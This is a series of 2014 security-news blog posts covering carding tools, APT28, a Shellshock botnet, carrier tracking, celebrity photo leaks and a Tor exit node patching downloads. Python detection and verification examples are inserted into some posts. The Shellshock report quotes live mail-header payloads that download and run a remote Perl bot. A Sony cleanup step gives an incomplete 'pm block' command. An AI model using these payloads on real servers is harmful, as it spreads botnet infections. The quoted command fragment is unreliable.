Oct 30 14

Voxis, the platform for automating rogue credit card charges is available in the underground

by Pierluigi Paganini

A group of cybercriminals is advertising in the underground an application for automating rogue credit card charges, dubbed the Voxis platform.

The cybercriminal ecosystem has a new tool in its arsenal, Voxis. The Voxis Platform is a payment gateway application that sends batches of stolen card charges to multiple gateway processors, automating the returns before acquiring banks can catch the illegal activity. The discovery was made by experts at IntelCrawler, a cyber threat intelligence firm from Los Angeles, which uncovered a criminal group called “Voxis Team” that specializes in money laundering and developed the application for this specific purpose.

“IntelCrawler, cyber threat intelligence firm from Los Angeles, has identified an active organized crime group called «Voxis Team», which specializes in money laundering by using their own specially designed payment gateway software which can send batches of stolen card charges to multiple gateway processors, automating their returns before acquiring banks can catch the merchant fraud.” states the blog post from IntelCrawler.

Voxis ad

The Voxis Team is advertising its web-based application on underground forums, proposing it as a tool for cashing out stolen credit cards by automating fraudulent purchases.

Applications of this kind are in demand right now because the large payment card breaches at U.S. retailers such as Target and Home Depot have flooded the underground market with stolen card data that criminals want to monetize quickly.

Voxis 2

The Voxis Platform is an effective instrument for emulating human behavior and avoiding the anti-fraud systems that are triggered when specific fraud patterns are recognized. Every online transaction involves three roles: the buyer, the seller and the payment gateway. The seller receives the money from transactions only if it has a merchant account registered with the payment gateway.

“… ,bad actors can use speed to automate and load cards to be charged for predetermined amounts at predetermined times, all with the goal of sliding under fraud detection systems. The emulation of human behavior and buying patterns increases their probabilities of having charges authorised.” states the post published by IntelCrawler.

“The black market has money mules and stolen identities which allows bad actors the necessary resources to open merchant accounts. They can easily build fake web sites and turn in stolen documents to get approved merchant accounts. The issue for them has always been hammering the merchant accounts with stolen cards before the account gets cut off.”

The tactic adopted by crooks is well established: cybercriminals gain access to merchant accounts or open rogue ones by setting up dummy e-commerce sites and using fake identity documents or money mules. As explained by IntelCrawler, the principal problem for the criminals is time; they have to complete the highest possible number of fraudulent charges before they are detected and their merchant accounts get closed.

The Voxis Platform speeds up this process, letting criminals push through the highest possible number of fraudulent charges. On a specialized forum the Voxis team claims that the software supports 32 different payment gateways and has been designed to emulate human interaction “to make it look like real humans are sending their credit card information to the payment gateways.”

Voxis ad supported gateway

«Voxis Team» appeared on the black market in August 2014 with its own group of developers. One of the interesting features implemented by the Voxis team is the automated filling of missing information about the credit card holder, a function implemented using a people search service.

E-commerce websites and payment gateway operators must revise their merchant account verification process and improve their fraud-detection methods to respond to the increasing sophistication of the tactics adopted by criminals.


Pierluigi Paganini

Security Affairs –  (Voxis platform, cybercrime)

Oct 30 14

Hackers infiltrated a White House unclassified computer network

by Pierluigi Paganini

According to an unnamed official at the White House, hackers infiltrated an unclassified network. The Obama Administration has confirmed the incident.

An embarrassing incident involved the computer systems of the Obama Administration: according to the media, an unclassified computer network used by the US government was infiltrated by hackers.

The New York Times reported that an unnamed official working at the White House admitted that systems used by President Obama’s staff were breached by external hackers. The intrusion was detected by defense systems and triggered temporary system outages.

The system outages were caused “as a result of measures we have taken to defend our network,” said the official.

According to the experts the hackers were engaged in reconnaissance; there is no evidence of a data breach or of sabotage. The attackers were trying to discover the composition of the unclassified White House network.

“Administration officials said the attack did not appear to be aimed at destruction of either data or hardware, or to take over other systems at the White House. That strongly suggests that the hackers’ intention was either to probe and map the unclassified White House system, find entry points where they connect to other system or conduct fairly standard espionage.” reported The New York Times.

The Washington Post speculated that Russian hackers may have coordinated the intrusion into the unclassified White House network. The thesis is supported by the results of recent investigations into large-scale espionage campaigns, which uncovered hacking operations run by Russian hackers probably linked to the Kremlin.

White House

“The Russian intelligence service was believed to have been behind a breach of the U.S. military’s classified networks, which was discovered in 2008. ” reported the Washington Post.

Recently the security firm iSight issued a report on an APT group dubbed the “Sandworm” team, which was running a cyber espionage campaign against NATO and other government entities, including the European Union and Ukraine.

Yesterday the security firm FireEye reported on another APT group, dubbed APT28, which seems to be linked to the Russian government and has been active since 2007. APT28 runs cyber espionage campaigns against governments, militaries and security companies worldwide.

“Certainly a variety of actors find our networks to be attractive targets and seek access to sensitive information. We are still assessing the activity of concern.” White House officials said.

“On a regular basis, there are bad actors out there who are attempting to achieve intrusions into our system,” said a second White House official. “This is a constant battle for the government and our sensitive government computer systems, so it’s always a concern for us that individuals are trying to compromise systems and get access to our networks.”

The Secret Service, the National Security Agency and the FBI are investigating the security breach.

Pierluigi Paganini

Security Affairs –  (White House, cyber espionage)

Oct 29 14

Sony Xperia Smartphones send user data to China

by Pierluigi Paganini

Security experts have discovered that Sony Xperia smartphones secretly send user data to servers in China due to the presence of the Baidu spyware.

Sony Xperia devices secretly send user data to servers in China; this is the latest news shocking the mobile industry, and it was published on several forums. The problem relates to Sony devices running Android 4.4.2 or 4.4.4 KitKat, and the anomalous behavior is observable even if the user hasn’t installed any application on the smartphone.

The news is disconcerting: it seems that some new Sony Xperia smartphones contain the Baidu spyware. A few weeks ago a group of users belonging to an online community of Sony Xperia owners discovered the presence of a folder named “Baidu” on their devices, created without the owner’s permission.

Thanks to the presence of the folder it is very easy for users to verify whether the Baidu spyware has infected their device.

Another worrying aspect is that users are unable to delete it from their Sony Xperia smartphone: once they try to remove it, it instantly reappears. Users cannot delete the Baidu folder even if they try the same procedure after starting the phone in Safe Mode.

“Just unpacked my Sony Z3 compact, haven’t installed a single app and it’s connecting to China. I am not so concerned about the folder itself but my phone now has a constant connection to an IP address in Beijing, which I am not too happy about.” is the comment of a Sony Xperia smartphone user published in a Reddit discussion on the topic.

According to the reports circulating online, the new Sony Xperia Z3 and Z3 Compact are affected by the problem, but many other users detected the folder on their devices, not only Sony smartphones. The owners of an HTC One M7, an HTC One X and a few users of the OnePlus One have discovered the presence of the Baidu malware.

As reported by the colleagues at TheHackerNews, the mysterious Baidu folder appears to be created by Sony’s “my Xperia” service every time the handset establishes a connection, and it is reported to be sending pings to China.


Many users reported that the Chinese government is able to control the spyware to gain access to the user’s device in exactly the same way any RAT does. In particular, a user with the nickname Elbird posted on different Sony forums that the Baidu malware allows the Chinese government to perform the following actions:

  • Read status and identity of your device
  • Make pictures and videos without your knowledge
  • Get your exact location
  • Read the contents of your USB memory
  • Read or edit accounts
  • Change security settings
  • Completely manage your network access
  • Pair with Bluetooth devices
  • Know what apps you are using
  • Prevent your device from entering sleep mode
  • Change audio settings
  • Change system settings

The Sony Xperia case arrives a few days after the news that Chinese smartphone manufacturer Xiaomi was involved in a similar issue; experts claim that the company is spying on personal user data. A few months ago, experts at F-Secure collected evidence that Xiaomi smartphones were sending user data back to servers based in China.

Sony still hasn’t officially commented on the case, although it has admitted the issue by announcing the release of a fix.

Below are the instructions to remove the Baidu spyware from the device.

  1. Backup your data and factory reset the device.
  2. Go to Settings -> Apps -> Running and force stop both “MyXperia” apps.
  3. Remove the Baidu folder using KommanderFile app.
  4. Go to Settings -> About Phone -> Click 7 times on the Build Number to enable developer mode.
  5. Download or Install the Android SDK on your computer and then connect the Sony device to it using USB cable.
  6. Run the adb tool from a terminal: adb shell
  7. In the adb shell, type the command: pm block
  8. Exit the adb shell.
  9. Reboot the device.

Pierluigi Paganini

Security Affairs –  (Sony Xperia Smartphones, mobile malware)

Oct 29 14

APT28: FireEye uncovered a Russian cyber espionage campaign

by Pierluigi Paganini
APT28 report

APT28: FireEye has issued a new report uncovering a large-scale cyber espionage campaign that appears to be sponsored by the Russian government.

A report published by FireEye reveals that a group of Russian hackers, dubbed APT28, is behind long-running cyber espionage campaigns that targeted US defense contractors, European security organizations and Eastern European government entities.

The hackers also targeted attendees of European defense exhibitions, including EuroNaval 2014, EUROSATORY 2014, the Counter Terror Expo and the Farnborough Airshow 2014.

Recently, principal security firms (Cisco, FireEye, F-Secure, iSight Partners, Microsoft, Tenable and others) were involved in a joint effort dubbed Operation SMN against the cyber espionage group known as Hidden Lynx and its arsenal.

Table for APT28

FireEye researchers collected evidence that the APT28 group is linked to the Russian government; the team of hackers “does not appear to conduct widespread intellectual property theft for economic gain, but instead is focused on collecting intelligence that would be most useful to a government.”

“APT28 appeared to target individuals affiliated with European security organizations and global multilateral institutions. The Russian government has long cited European security organizations like NATO and the OSCE as existential threats, particularly during periods of increased tension in Europe,” FireEye reported.

APT28 has been active since 2007 and has targeted governments, militaries, and security organizations. The group focused its hacking campaigns on targets that would be of interest to Russia, such as the Caucasus region, with a focus on Georgia.

“Despite rumors of the Russian government’s alleged involvement in high-profile government and military cyber-attacks, there has been little hard evidence of any link to cyberespionage,” said Dan McWhorter, FireEye vice president of threat intelligence. “FireEye’s latest advanced persistent threat report sheds light on cyberespionage operations that we assess to be most likely sponsored by the Russian government, long believed to be a leader among major nations in performing sophisticated network attacks.”

The majority of the files analyzed by experts at FireEye were set to Russian language settings; this circumstance suggests “that a significant portion of APT28 malware was compiled in a Russian-language build environment consistently over the course of six years.”

The timing of the malware development also suggests the involvement of a Russia-based team: nearly 96 percent of the malware was compiled between Monday and Friday during an 8 AM to 6 PM work day in the Moscow time zone.

APT28 used spear phishing emails to trick victims into opening an infected file or following a malicious link.

APT28 report 2

The APT28 group has used numerous common tools in its hacking campaigns, including a downloader called Sourface (aka Sofacy), the backdoor Eviltoss and the modular implant known as Chopstick.

Sofacy was also used in the cyber espionage campaign dubbed “Operation Pawn Storm,” recently uncovered by Trend Micro, which targeted military, government and media organizations worldwide. In particular, Chopstick caught the attention of researchers because it “demonstrates formal coding practices indicative of methodical, diligent programmers.” Chopstick is a modular agent that appears very flexible and, according to the experts, is designed for long-term use and versatility. In the report the experts analyzed two different instances of CHOPSTICK containing “vastly different functionality,” depending on the modules the authors included in the malicious agent.

The Eviltoss backdoor uses asymmetric encryption to protect the data siphoned from victims, and some samples detected by the experts also use SMTP to transfer stolen data outside the organization.

“APT28 is most likely supported by a group of developers creating tools intended for long-term use and versatility, who make an effort to obfuscate their activity,” FireEye wrote. “This suggests that APT28 receives direct ongoing financial and other resources from a well-established organization, most likely a nation state government.”

Let me invite you to read the excellent report, which can be downloaded here:

Pierluigi Paganini

Security Affairs –  (APT28, cyber espionage)

Oct 28 14

Experts at SANS discovered a Shellshock SMTP Botnet Campaign

by Pierluigi Paganini

Experts at the SANS Internet Storm Center discovered a new Shellshock botnet campaign that is targeting SMTP gateways worldwide.

A new wave of attacks exploiting the Shellshock flaw is targeting SMTP servers worldwide, according to a post published by the SANS Internet Storm Center. SANS explained that the payload is an IRC Perl bot with simple DDoS commands that can also be used to fetch and execute additional malicious code.

The new Shellshock campaign targets SMTP gateways, searching for vulnerable MTAs / MDAs; the attackers hide the malicious code in the message’s headers.

The attackers include the following code in several message fields, including the “To:”, “From:”, “Subject:”, “Date:” and “Message-ID:” fields, among others.

Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend
References:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend
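A defender-side check for the poisoned headers shown above, as an added example that is not code from the SANS/ISC or Binary Defense posts: it parses a mail message, flags every header whose value starts with the bash function-definition prefix that Shellshock (CVE-2014-6271) keys on, and splits a hit into the commands the payload would run. The sample message is constructed from the header values quoted above (URL kept defanged as hxxp); the other header values are made-up filler.

```python
import email
import re

# A Shellshock payload is a header value that starts with an empty bash
# function definition, "() { :; };", followed by the commands to execute.
# The regex only anchors on the "() {" prefix so spacing variants are caught.
SHELLSHOCK_PREFIX = re.compile(r"^\s*\(\)\s*\{")


def scan_headers(raw_message):
    """Return [(header_name, value)] for every header carrying the prefix."""
    msg = email.message_from_string(raw_message)
    return [(name, value.strip()) for name, value in msg.items()
            if SHELLSHOCK_PREFIX.match(value)]


def extract_commands(value):
    """Split the text after the function body into the individual commands.

    For '() { :; };wget ...;killall -9 perl;perl /tmp/.legend' this yields
    three commands, which is what an analyst needs for blocking and triage.
    """
    end = value.find("};")
    if end < 0:
        return []
    return [cmd.strip() for cmd in value[end + 2:].split(";") if cmd.strip()]


def triage(raw_message):
    """Summarise one message: which headers were poisoned and what they run."""
    hits = scan_headers(raw_message)
    return {
        "poisoned_headers": [name for name, _ in hits],
        "commands": sorted({cmd for _, value in hits
                            for cmd in extract_commands(value)}),
    }


# Constructed message built from the header values quoted in the post.
PAYLOAD = ("() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;"
           "killall -9 perl;perl /tmp/.legend")
SAMPLE = f"""\
From: {PAYLOAD}
To: postmaster@mx.example
Subject: {PAYLOAD}
Date: Tue, 28 Oct 2014 10:00:00 +0000
Message-ID: {PAYLOAD}
References: {PAYLOAD}

nothing to see here
"""

# Constructed benign message: "()" alone must not trigger the detector.
CLEAN = """\
From: alice@sender.example
To: postmaster@mx.example
Subject: () is the empty tuple, not a shell function

plain message
"""

if __name__ == "__main__":
    print(triage(SAMPLE))
    print(triage(CLEAN))
```

Matching on the prefix alone is deliberate: the fetched URL and the dropped file name change between waves, the function-definition prefix does not.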

The Shellshock vulnerability is continuing to create problems more than a month after it was publicly disclosed; threat actors are exploiting the BashBug vulnerability to drop a malicious Perl script onto targeted machines.

The script is used by the attackers to recruit the computer into a botnet that is controlled over IRC, said a post on the Binary Defense Systems website.

“The attack leverages Shellshock as a main attack vector through the subject, body, to, from fields,” reports the Binary Defense Systems website. “Once compromised, a perl botnet is activated and beaconing on IRC for further instructions.”

The following image shows the original email used in the attacks, containing the initial Shellshock payload:

ShellShock perl_code_botnet_1

“It’s unknown which product would specifically be vulnerable to this since Shellshock relies on system level calls and leveraging bash however it seems to be a fairly wide-scale delivery of emails across the United States,” BDS added.

Security experts have detected numerous attacks worldwide exploiting the Shellshock flaw, including attacks against VoIP systems and campaigns spreading malware such as the Mayhem botnet.

A honeypot run by experts at AlienVault Labs detected two separate strains of malware attempting to exploit the Shellshock vulnerability within 24 hours of the disclosure.

In September, researchers at FireEye published details on several proof-of-concept scripts that exploit the Shellshock bug.

“We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise,” FireEye wrote.

As explained many times, many hidden functions on Linux/Unix-based systems could be affected because they may invoke the flawed Bash; patching the entire population of vulnerable machines in a short time is quite complex, and cybercriminals know this.

The situation is particularly critical for Internet of Things devices, for which in many cases no upgrade is available or it is impossible to apply any update.

Pierluigi Paganini

Security Affairs –  (Shellshock , SMTP)

Oct 28 14

Verizon Wireless tracks its clients with the UIDH technology

by Pierluigi Paganini
Verizon Wireless UIDH 2

Verizon Wireless injects UIDH headers into every user’s web request to track the user’s web experience, including visited websites and browsing habits.

Verizon Wireless, the largest US telecom operator, is tracking the internet traffic of its mobile users by adding a token to web requests. The token is used by the company for advertising purposes: Verizon tracks the user’s habits even if the user has opted out of its Customer Proprietary Network Information (CPNI) options.

Customer proprietary network information (CPNI) is the information collected by a telecommunications carrier about a user’s calls, including call data and any information that appears on the consumer’s telephone bill.

It seems that the practice has been going on for two years, since the company launched the Unique Identifier Token Header (UIDH) under its Relevant Mobile Advertising program.

The Verizon network adds the X-UIDH header to the requests traveling over its network; each header carries a unique identifier associated with the mobile device.

The UIDH allows Verizon to track the customer’s web experience, including visited websites and mobile apps used. The solution implemented by Verizon is called PrecisionID and allows the company to profile users and their interests to tailor advertisements, according to internal documentation.

Verizon uses a different UIDH value each week; the data used by advertisers includes the subscribers’ postal address, device type, language preferences, gender, age, hobbies and personal interests.

“In addition, we will use an anonymous, unique identifier we create when you register on our websites. This may allow an advertiser to use information they have about your visits to online websites to deliver marketing messages to mobile devices on our network,” explains Verizon on its website. “We do not share information that identifies you personally outside of Verizon as part of this program. [Some of this information was] obtained from other companies.”

Verizon Wireless UIDH

“Verizon is rewriting your HTTP requests to insert a permacookie? Terrible,” tweeted Jacob Hoffman-Andrews, a senior staff technologist with the Electronic Frontier Foundation.

The alarming issue is that there is no way for Verizon users to stay off the company’s radar, even if they enable private browsing mode, use a new handset or enable Verizon’s privacy settings.

“Verizon responded that while the UIDH is still in the queries, consumers who have opted out of the program will no longer have information associated with the identifier. The company did not, however, pledge to stop updating the user’s profile.” reported Robert Lemos from ArsTechnica.

The only way for Verizon users to avoid the company’s tracking is to use a full-encryption solution such as a VPN (e.g. TunnelBear) or Tor.

Pierluigi Paganini

Security Affairs –  (Verizon UIDH , privacy)

Oct 27 14

The Fappening part 6 is out … a boring saga

by Pierluigi Paganini
the fappening

Part 6 of the Fappening archive is online; it includes images of Nicola Peltz, Krysten Ritter, Angie Miller, Aubrey Cleland and Tobie Percival.

The effects of the Fappening, aka the iCloud Hack, are still evident in cyberspace. Relentless hackers released a new archive over the weekend, part 6 of the overall Fappening case, which includes the images of another five Hollywood celebrities.

According to reports on the Internet, the hackers tried to persuade the image hosting site Imgrobot to publish the leaked images of the Fappening saga, after the managers of the website had removed all the photos fearing copyright violation lawsuits from the Hollywood celebrities.

The Fappening 6 archive includes images of Nicola Peltz (Bradley Martin in the A&E series Bates Motel and Tessa Yeager in the movie Transformers: Age of Extinction) and of the actress and musician Krysten Ritter. The new archive of the Fappening collection also includes pictures of celebrities not involved in previous leaks, including American Idol finalist Angie Miller, Aubrey Cleland and Tobie Percival.


Also in this case the pictures seem to have the same origin as the photos in the archives released under the Fappening umbrella: they all come from iCloud accounts that were hacked by criminals.

Sergei Kholodovskii, a 28-year-old Russian, is the owner of the iCloud Hacks leaked images website; he nonetheless declared that he isn’t involved in the data theft and that his role is just to act as a facilitator for the diffusion of the Fappening archives.

“All the photos on our website were taken from open sources, no individual’s privacy was violated,” said Sergei Kholodovskii. Kholodovskii published a disclaimer on his website to specify his position, and explained that he will host more photos if they become available on the Internet.

Summing up the various episodes of the Fappening case, let me remind you that Part 5 of the iCloud Hacks leaks was posted online a couple of weeks ago.

The Fappening 5 included the images of another seven Hollywood celebrities: model Allegra Carpenter, Kaime O’Teter, British actress Lauren O’Neil, TV star Lindsay Clubine, Miss Virginia USA 2013 Shannon McAnally, Wailana Geisen and Nina Stavris.

Who will be next?

Pierluigi Paganini

Security Affairs –  (The Fappening, data leakage)

Oct 27 14

Backoff infections rise up to 57 percent increase in Q3

by Pierluigi Paganini
Backoff malware 2

Security firm Damballa issued the ‘State of Infections Report Q3 2014’, which highlights a 57% increase in infections of the notorious Backoff POS malware.

Security experts at Damballa detected a 57% increase in infections of the notorious Backoff malware in the third quarter; the number of infections jumped from August to September, and in September alone Backoff infections increased 27%.

The situation is very worrying, and law enforcement fears an explosion in the number of infections worldwide: the US Secret Service estimated that as many as 1,000 US businesses may be compromised by the Backoff malware. The malicious code has already been used against major companies including UPS and Dairy Queen. This summer the US-CERT warned that threat actors were using remote desktop tools such as LogMeIn, Splashtop 2 and Apple Remote Desktop to deploy the PoS malware and siphon data.

The experts are concerned by the evasion techniques implemented by the author of the malware and by the lack of security measures in many environments compromised by the malicious code.

“The increase is notable as it highlights that the malware had bypassed network prevention controls and was active, yet hidden, in the network.” states the official announcement from Damballa.

Many PoS systems targeted by the malware are exposed on the Internet for maintenance purposes; this enlarges their attack surface and exposes them to further risks.

“In many cases, the PoS systems are free-standing from the corporate network,” says Damballa CTO Brian Foster. “They connect to local networks, which have limited security. Without this visibility, it’s impossible to discover the device is communicating with criminal command and control.”

Backoff malware

The report once again highlights the urgency of assuming a correct security posture, especially in those industries more impacted by criminal activity, like the retail sector. Companies must be aware of the cyber threats and of the TTPs (tactics, techniques and procedures) adopted by bad actors.

Companies fail to secure outbound network connections and to encrypt PoS data; most POS malware, including the Backoff malicious code, are advanced threats that allow bad actors to remain persistent and undercover for a long time. Backoff, like many other POS malware families, is able to bypass prevention controls like anti-virus, IPS and firewalls that are adopted by almost every company.

“In a quick test performed in Damballa’s lab, a researcher tested Sinowal, a common malware file, and found that 45 of 55 antivirus products identified it as malware. Next, he created a new malware file by binding Sinowal to a Windows Help program file. He retested the new file and it was only detected by one of the 55 anti-virus products. The entire process of altering the malware file took less than two minutes. If the file had been opened by an unsuspecting end-user, the Windows Help file would have executed and in the background the malware file would have infected the device.” states the report issued by Damballa.

POS malware is very insidious; attackers are using “constantly morphing malware because binaries change on a daily basis”, which means that the malware is able to evolve over time through continuous updates and repackaging, making its detection hard.

Backoff malware 3

Signature-based prevention is ineffective; threat intelligence analysis is the only way to mitigate these threats.

Pierluigi Paganini

Security Affairs –  (Backoff, POS Malware)

Oct 27 14

RRVS, Facebook and Yahoo work to prevent identity theft

by Pierluigi Paganini

Facebook and Yahoo have designed an SMTP extension dubbed RRVS, Require-Recipient-Valid-Since, to prevent the abuse of email addresses that have changed ownership.

Last year Yahoo announced the decision to reset any account that had not been used for 12 months, making those addresses available to other users. The decision raised several security and privacy concerns: the policy chosen by Yahoo could expose users to the risk of identity theft. Imagine, for example, that a user registered the same Yahoo email with other web services; the new owner of the account could impersonate the old one and request a password reset to gain access to all the services linked to that email (e.g. Facebook).

Facebook confirmed its concern about the security of Facebook accounts linked to a recycled Yahoo address, which could be taken over by the new owner of that address.


Yahoo and Facebook worked together to overcome the problem: their engineers developed an SMTP extension dubbed Require-Recipient-Valid-Since (RRVS), which inserts a timestamp in the header of an email message. The timestamp indicates when Facebook last confirmed ownership of the Yahoo account.


“If the account changed hands since our last confirmation, Yahoo can just drop the message, preventing delivery of sensitive messages to the wrong hands,” explained Murray Kucherawy, a software engineer at Facebook.

On Thursday Facebook announced that the RRVS specification, RFC 7293, was approved as a Proposed Standard by the IETF.

“The intended use of these facilities is on automatically generated messages, such as account statements or password-change instructions, that might contain sensitive information, though it may also be useful in other applications,” states the draft.

Using the RRVS extension, the sender is able to state which recipient it meant as of a certain point in time.

“A receiving system can compare this information against the point in time at which the address was assigned to its current user,” the draft says. “If the assignment was made later than the point in time indicated in the message, there is a good chance the current user of the address is not the correct recipient. The receiving system can then prevent delivery and, preferably, notify the original sender of the problem.”
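The receiving-side comparison the draft describes, as an added example (not Facebook’s or Yahoo’s code): it parses the Require-Recipient-Valid-Since header field and the RRVS parameter on SMTP RCPT TO in the forms RFC 7293 lays out, then checks the timestamp against a table of when each mailbox was assigned to its current owner. The mailbox addresses, the assignment table and the sample messages are constructed; treating an address with no assignment record as never reassigned is an assumption of this example.

```python
import email
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime


def parse_rrvs_header(value):
    """Parse 'addr-spec; date-time' from a Require-Recipient-Valid-Since field.

    Example value: 'user@example.com; Sat, 1 Jun 2013 09:23:01 -0700'
    Returns (lower-cased address, timezone-aware datetime).
    """
    addr, sep, when = value.partition(";")
    if not sep:
        raise ValueError("RRVS header needs 'address; date-time'")
    return addr.strip().lower(), parsedate_to_datetime(when.strip())


def parse_rrvs_rcpt_param(param):
    """Parse the RRVS parameter carried on an SMTP 'RCPT TO' command.

    Example: 'RRVS=2014-04-03T23:01:00Z;C'. An RFC 3339 timestamp is followed
    by an optional mode: 'R' (reject on mismatch, the default) or 'C'
    (continue delivery). Returns (timezone-aware datetime, mode).
    """
    name, _, rest = param.partition("=")
    if name.upper() != "RRVS":
        raise ValueError("not an RRVS parameter")
    stamp, _, mode = rest.partition(";")
    mode = (mode or "R").upper()
    if mode not in ("R", "C"):
        raise ValueError("RRVS mode must be R or C")
    return datetime.fromisoformat(stamp.replace("Z", "+00:00")), mode


def rrvs_decision(recipient, valid_since, assigned_at, mode="R"):
    """Decide what the receiving MTA does with one recipient.

    assigned_at: when the mailbox was handed to its current owner, or None
    when the receiver has no record of a change (assumption: unchanged).
    Returns 'deliver', 'reject', or 'continue' (deliver despite the
    mismatch, as mode 'C' requests; the RFC expects the receiver to strip
    the header and log the event in that case).
    """
    if assigned_at is None or assigned_at <= valid_since:
        return "deliver"
    return "continue" if mode == "C" else "reject"


def check_message(raw_message, assignments, mode="R"):
    """Apply a raw message's RRVS header against an assignment table."""
    msg = email.message_from_string(raw_message)
    header = msg.get("Require-Recipient-Valid-Since")
    if header is None:
        return "deliver"  # no RRVS claim to check
    recipient, valid_since = parse_rrvs_header(header)
    return rrvs_decision(recipient, valid_since,
                         assignments.get(recipient), mode)


# Constructed receiver-side table: when each mailbox went to its current
# owner. alice@ was recycled in June 2014; bob@ never changed hands.
ASSIGNMENTS = {
    "alice@example.com": datetime(2014, 6, 1, tzinfo=timezone.utc),
    "bob@example.com": datetime(2012, 1, 15, tzinfo=timezone.utc),
}

# Constructed password-reset notice; the sender last confirmed that alice@
# belonged to its user in June 2013, before the mailbox was recycled.
RESET_TO_ALICE = """\
From: security@sender.example
To: alice@example.com
Subject: Password reset instructions
Require-Recipient-Valid-Since: alice@example.com;
  Sat, 1 Jun 2013 09:23:01 -0700

Follow the link to reset your password.
"""

RESET_TO_BOB = RESET_TO_ALICE.replace("alice@example.com", "bob@example.com")

if __name__ == "__main__":
    print(check_message(RESET_TO_ALICE, ASSIGNMENTS))  # recycled after 2013
    print(check_message(RESET_TO_BOB, ASSIGNMENTS))    # same owner all along
    print(parse_rrvs_rcpt_param("RRVS=2014-04-03T23:01:00Z;C"))
```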

A few days ago, Facebook announced that it has developed a tool that mines paste sites such as Pastebin and GitHub searching for stolen credentials belonging to Facebook accounts. The company is aware of the value of the accounts in the criminal underground and of how crooks use them for illicit activities, and its recent efforts, including RRVS, are its response to prevent any abuse.

Pierluigi Paganini

Security Affairs –  (RRVS, identity theft, Require-Recipient-Valid-Since)

Oct 27 14

Russian Tor exit node patches downloaded files with malware

by Pierluigi Paganini
Tor exit node attack 1

The researcher Josh Pitts of Leviathan Security Group identified a Russian Tor exit node that is patching the binaries downloaded by the users with malware.

Once again the Tor network is under attack: Josh Pitts of Leviathan Security Group identified a Tor exit node that was being used to patch binaries downloaded by users, with the threat actors adding malware to the files on the fly.

Tor is a system that anonymizes users’ online activity, but as explained many times this holds only under specific conditions: the manipulation of scripts running on a visited website, or of a file downloaded from an untrusted repository, could reveal a Tor user’s identity.

In this case we face the danger of trusting files downloaded from unknown sources, but consider that an attacker could also use a similar technique after compromising a legitimate website, and that compromising or setting up an exit node to do the “dirty job” is always possible.

Many binaries are hosted without any transport layer encryption, and only in some cases are signed files available to protect against on-the-fly modification.

To mitigate such attacks, encrypted download channels are the best option to avoid manipulation of the binaries.

“SSL/TLS is the only way to prevent this from happening. End-users may want to consider installing HTTPS Everywhere or similar plugins for their browser to help ensure their traffic is always encrypted,” said Pitts.

Pitts discovered the anomalous behavior of the Tor exit node while conducting research on download servers that could be abused to patch binaries during download through a man-in-the-middle attack.

“After creating and using a new exitmap module, I found downloaded binaries being patched through a Tor exit node in Russia,” said Pitts in the blog post.

At the DerbyCon conference the researcher presented how to run MITM patching of binaries during download using BDFProxy. The Backdoor Factory framework (BDF), designed by the researcher, allows him to patch executable binaries with shellcode that an attacker could use to execute arbitrary code without the user noticing any suspicious activity.

Unfortunately, this attack could be conducted by anyone on the Internet, and as demonstrated by Pitts, it can be effective against Tor anonymity for an attacker controlling one or more exit nodes.

Internet users, consciously or not, download an impressive number of files every day; consider software updates, for example. If an attacker is able to control the download process for security updates, he can infect a large number of machines simply by injecting malware into the update channel.

The update process is considered the most worrying scenario by security experts, because in many cases the downloaded file is trusted by default. The attack chain could also be improved by abusing fake digital certificates in the digital signature mechanism.

Legitimate software vendors usually sign their binaries, so any modification to the code will cause verification errors. This is the scenario the researcher observed during his tests: an attacker running a MITM attack while the user is downloading a file can actively patch the binary with his own code.

“I tested BDFProxy against a number of binaries and update processes, including Microsoft Windows Automatic updates. The good news is that if an entity is actively patching Windows PE files for Windows Update, the update verification process detects it, and you will receive error code 0x80200053.” states Pitts.
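Why a verification step catches the patch, and why the published digest must arrive over a channel the exit node cannot rewrite, as an added example that is not code from the article or from Leviathan's BDFProxy or exitmap. The "binary" and the on-the-fly patch are constructed inert bytes; the digest stands in for the vendor's published hash or signature, which in practice would come from a TLS-protected page or a signed manifest.

```python
"""Integrity check for a downloaded file against an on-the-fly MITM patch.

Added example, not from the article or from BDFProxy/exitmap. All bytes and
digests below are constructed for the demonstration.
"""
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of the downloaded bytes."""
    return hashlib.sha256(data).hexdigest()


def verify_download(data: bytes, published_sha256: str) -> bool:
    """Compare the file digest with the digest published by the vendor.

    hmac.compare_digest avoids a timing side channel on the comparison itself.
    """
    return hmac.compare_digest(sha256_hex(data), published_sha256.lower())


def mitm_patch(original: bytes, payload: bytes, offset: int) -> bytes:
    """Simulate an exit node overwriting bytes in transit (constructed, inert).

    The patch keeps the file length unchanged, so a size check alone would
    not notice it; only a digest/signature check does.
    """
    if offset + len(payload) > len(original):
        raise ValueError("patch would run past end of file")
    return original[:offset] + payload + original[offset + len(payload):]


# Constructed stand-in for a legitimate download (real builds are MB-sized).
ORIGINAL = b"MZ" + b"\x00" * 62 + b"legit code section" * 4
# What the vendor would publish over an authenticated channel (TLS page, signed manifest).
PUBLISHED_DIGEST = sha256_hex(ORIGINAL)


def demo():
    """Run the clean/tampered comparison and return the observations."""
    tampered = mitm_patch(ORIGINAL, b"XXXX", 64)
    return {
        "clean_passes": verify_download(ORIGINAL, PUBLISHED_DIGEST),
        "patched_passes": verify_download(tampered, PUBLISHED_DIGEST),
        "size_unchanged": len(tampered) == len(ORIGINAL),
        # If the digest itself is fetched over the same plaintext channel, the
        # exit node can rewrite both, and verification becomes meaningless.
        "patched_passes_with_rewritten_digest":
            verify_download(tampered, sha256_hex(tampered)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The last entry is the caveat that matters for the Tor case: a hash posted next to the download on an unencrypted page gives no protection, because whoever patches the file can patch the hash too. The digest or signature has to be obtained through TLS or a key the client already trusts, which is what makes the Windows Update failure Pitts observed a useful signal rather than a coincidence.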

Tor exit node attack

The expert extended his analysis to Tor exit nodes, discovering that a malicious node in Russia was actively patching any binary he downloaded with a piece of malware. Fortunately, at the time of writing this Tor exit node is the only one known to be running the attack.

